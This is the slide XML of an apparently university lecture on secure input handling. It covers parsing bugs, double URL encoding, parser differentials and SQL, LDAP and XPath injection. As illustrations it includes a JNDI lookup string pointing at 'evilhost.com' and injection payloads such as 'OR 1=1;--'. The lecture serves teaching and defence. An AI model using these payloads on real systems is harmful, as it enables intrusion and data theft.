              <a:t>languages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Processing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> an input begins with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parsing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depends on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input language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format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protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP/IP packets, HTTP, HTML, X509, mp3, JPEG, PDF, URL,    email address, Word, Excel, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input handling bugs often come down to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parsing bugs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buggy parsing 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buffer overflow in PDF parsing)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unintended parsing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parsing user input as SQL command)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96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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA14E64A-A046-2CE5-399D-E579E766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 read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Tijdelijke aanduiding voor inhoud 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF51FB5-E469-6452-4D40-8D9A7CD8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33" dirty="0"/>
              <a:t>Wang et al., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If It's Not Secure, It Should Not Compile: Preventing DOM-Based XSS in Large-Scale Web Development with API Hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1633" dirty="0"/>
              <a:t>, ICSE'21, ACM/IEEE, 2021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1633" dirty="0"/>
              <a:t>Lectures notes on Secure Input Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1633" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1633" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77828" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A119D3F8-941A-B589-0493-29C820214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90D8849-DD8B-4112-A1D0-F8A56F9D59EB}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL"/>
              <a:pPr/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77829" name="Afbeelding 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D73CA1F-48A7-D41B-4253-C67CC679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7" y="2645251"/>
            <a:ext cx="6797993" cy="38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4761DDE-8579-F86F-9F5D-F9A50062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177" dirty="0"/>
              <a:t>Getting things wrong: double en/decodings </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2177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EEEB97B-33A1-F95B-BA72-FD32089A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1" y="1012681"/>
            <a:ext cx="7839360" cy="5159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dirty="0"/>
              <a:t> Chrome used to crash on the URL  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http://%%30%30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%30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>URL-encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> of the character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600" dirty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600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>So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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is the URL-encoding of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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is the URL-encoding of  null character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="780068" lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>So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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>double-encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> null character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="494318" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cause of the crash: c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>ode deep inside Chrome performs a second URL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>coding (as well-intended ‘service’ to its client code?) and then some other code crashes on the resulting null character. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="94268" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>How could this bug have been detected or prevented?                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="94268" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Having encoded data around makes validation harder!                                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>Double encoding is a common way to get past validation checks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="494318" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>Note that encoding is the opposite of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>canonicalisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>:                                                     it introduces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>  representations of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>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marL="94268" indent="0"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Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keeping track of which data is encoded / may be decoded can be tricky in larger programs. Typing can help!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457153" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457153" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/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A3A008A-3806-7E65-D13B-F0D00BAC9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76E0C3D-B182-4D33-B457-15BA5B004C82}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:pPr/>
              <a:t>111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094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F747-E6DB-9241-49E5-4A57118A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F6BAC33-2208-574B-E70F-3A8E4861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Two kinds of problems: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> features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07950ECD-1E83-C37F-56B1-B9C64EE18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12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D86724A7-0B9A-2535-E1F4-AC340B6E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445" y="3545640"/>
            <a:ext cx="342576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(abuse of) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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 feature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="254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9C8C8AB-AF29-A243-20D2-4C021F22FB98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AF4A042F-3FDF-9677-8F86-D6341630E417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898AE81C-6567-7759-F95C-D8FE89EA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0C9AD35B-63F8-C266-14C8-C99C7C8D3F0A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478296DE-81B0-B166-0287-67EE02EE1225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6A4693E8-3E3C-40F4-8446-B69BF24F9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790C0FA1-3B0E-6A7A-E329-3135DB49A2D1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EFFA87DB-14A4-33D0-6C03-592697149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9BA08C9-D794-C841-00D9-FC3F6E596C5E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55F0953-A7E1-3C2B-4962-89FA02FE4E18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4270B076-81F1-DF30-2B77-636262DBA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2F7AD0C2-DB0E-C467-8377-B99AD604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D13A2491-6EB1-4F79-3749-CB45A78F57F6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6065280" cy="1710720"/>
            <a:chOff x="1198642" y="989203"/>
            <a:chExt cx="6685645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F60F2802-A8A8-1812-868F-4DDED8A8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7091D32D-509F-32FC-6CFB-64FE0F3AF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1A6023FD-70F5-928B-FE0D-411CBF71E225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6C744B4C-E850-6866-FDE7-6D738FA38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B92AB75A-45DC-50CF-46C5-C4A2746C7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2222717" cy="47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 dirty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26EEF7A0-64A0-4A16-2760-93368725E2F9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656B9920-6B96-CB70-6B59-4C46159178D2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9CC0DD6-A643-5660-394C-72FB98B89005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AFED62B9-DDC7-3EF7-C809-5BF332A5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  <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40996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CACB-3E33-DED9-407E-EE864B77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1C1D08F-8826-A407-9F30-0DF21A19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Buggy parsing  vs Unintended parsing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6416E20E-9505-99C6-54A3-EF7D16856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13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B0C492DE-C047-F355-0FCB-5E8F313C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480" y="3853205"/>
            <a:ext cx="445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Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>unintended parsing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="32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5147EE-63F0-9932-4542-0AD0760DDF4B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835FB59E-6E77-4B74-99A7-BEF3175C6EB9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A52B3DE6-0C9E-531E-E9B4-93332D3EF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72B8486F-71AF-951C-39CC-937A9B957793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43B40DA3-BBDD-4C07-5E55-84093EC5B8CD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3FA99C92-64BC-4D4A-29F7-184D62AC4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47D32652-CB6F-2399-0D43-677E11E34F45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33379631-609A-BD38-C750-8868F9A1A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473E7F6-436C-BBE9-0045-DC691970163C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77559FC-8B5A-9B78-D08B-73288827236B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3645E504-0DC5-474E-2635-C0F3FF708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B89C7245-1BE3-2724-FB2D-0F7BB8B18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09FDBC15-0AA6-2791-112A-4A7DC8375581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7507184" cy="1710720"/>
            <a:chOff x="1198642" y="989203"/>
            <a:chExt cx="8275029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8E6B6D4A-9E44-01D1-5ED1-4FC5BD7E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DD0BF1EC-F363-8836-83F0-B07B5CB5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EA3BB70-4260-843D-EBC5-A383BDD4F49E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DB9AE7B1-8A83-E107-0D66-05AB08BEB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22D79513-67FB-2893-0BF6-FC2D25A30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3812101" cy="50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  <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>buggy parsing</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US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AFB14584-0189-FA66-E6A3-53FA09E1B466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BB0DCBD1-D54F-E7CB-6EE8-7397A8593638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201E61A-136F-E0D6-7EA6-9BC7D7B98AFE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F4EE7D6D-FBCA-480E-1793-DFD1C0F7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  <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12472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(1) : insecure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cause security bugs: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/>
              <a:t>esp. if parser is written in memory unsafe language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory corruption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>can lead to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory leaks,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RCE, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>even parser written in memory safe language can still </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crash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If the data being parsed is input, these bugs are exploitable!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input formats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP/IP, 2/3/4/5G,  Bluetooth, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, JPEG, PDF, HTML, Word, ...  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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 examples from the fuzzing lecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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671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(2): incorrect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also cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mis-interpretation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For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  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www.paypal.com\0.mafia.com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sz="1800" dirty="0"/>
              <a:t>in X.509 certificate                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Name  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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paypal.com,mafia.com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in X.509 certificate</a:t>
            </a:r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For which domain is this JDNI loop-up?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${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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jndi:ldap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://127.0.0.1#.evilhost.com:1389/a}</a:t>
            </a:r>
          </a:p>
          <a:p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Aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parser differentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: two applications parse the same data differently, leading to exploitable misunderstandings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poorly specified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data formats 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NL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531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(3): unwanted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Correct but intended parsing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>can also cause security problems, esp. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> parsing (and processing) of user input </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as SQL command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as file path  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as OS command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as HTML or JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>....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EXPRESSIVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data formats/language</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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6392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Typical injection attack,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SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400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F6ECECB-7A1A-4B54-B508-939C5DAF405F}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16390" name="Groep 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="694017" y="2585035"/>
            <a:ext cx="7475959" cy="2706909"/>
            <a:chOff x="915240" y="4427754"/>
            <a:chExt cx="8241563" cy="2983876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6934100" y="5967151"/>
              <a:ext cx="2222703" cy="1444479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Back-end service, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB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 database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Explosie 2 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6753212" y="5905136"/>
              <a:ext cx="770158" cy="565861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pic>
          <p:nvPicPr>
            <p:cNvPr id="16404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0" y="4735048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057827" y="4973788"/>
              <a:ext cx="1457199" cy="3304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637262" y="4427754"/>
              <a:ext cx="2178811" cy="298387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630027" y="5898872"/>
              <a:ext cx="1465509" cy="491085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104328" y="605552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5224" y="4246849"/>
            <a:ext cx="1965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5640368" y="4059842"/>
            <a:ext cx="144000" cy="16128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Vrije vorm 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3189277" y="3090281"/>
            <a:ext cx="1807646" cy="1985870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Lijnbijschrift 1 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1242828" y="1357725"/>
            <a:ext cx="1737238" cy="415091"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 97628"/>
              <a:gd name="adj2" fmla="val 38859"/>
              <a:gd name="adj3" fmla="val 443557"/>
              <a:gd name="adj4" fmla="val 5828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’OR 1=1;--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Lijnbijschrift 1 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4575129" y="1249665"/>
            <a:ext cx="3956142" cy="1129569"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 98752"/>
              <a:gd name="adj2" fmla="val 37862"/>
              <a:gd name="adj3" fmla="val 241807"/>
              <a:gd name="adj4" fmla="val 25926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SELECT * FROM </a:t>
            </a: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Username = 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OR 1=1;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1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AND Password = ’1234’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="18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F216-BEC1-1CD9-61F7-60A3F042052D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261949" y="5633135"/>
            <a:ext cx="702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Is this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input problem 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or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output problem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?</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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134672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General recipe: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user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is combined with other data and forwarded to &amp; processed by some back-end API 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Tell-tale sign 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>special characters or keywords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&lt; &gt; \ &amp;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Tell-tale sign 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use of 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strings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157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LDAP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/>
              <a:t>An LDAP query sent to the LDAP server to authenticate a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/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abcd1234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)) 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can be corrupted by giving as username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dirty="0"/>
              <a:t>which results in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admin)(&amp;))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PASSWD=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where only first part is used,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>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is LDAP notation for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194217"/>
            <a:ext cx="7772400" cy="1847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/>
              <a:t>Software Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
              <a:t>Secure Input Handling</a:t>
            </a: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4120695"/>
            <a:ext cx="6400800" cy="1156105"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="8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800" dirty="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 err="1"/>
              <a:t>Radboud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2000" dirty="0"/>
              <a:t> University Nijmegen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="9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36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1334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XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" err="1"/>
              <a:t>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XML data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>, 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student_database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jan&lt;/username&gt;&lt;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&gt;abcd1234&lt;/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kees&lt;/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nameuser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&lt;/student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en-GB" dirty="0"/>
              <a:t>can be accessed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XPath queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eg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(//student[username/text()='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/text()='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abcd123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']/account/text())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nl-NL" sz="1800" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>which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can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be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corrupted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by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malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
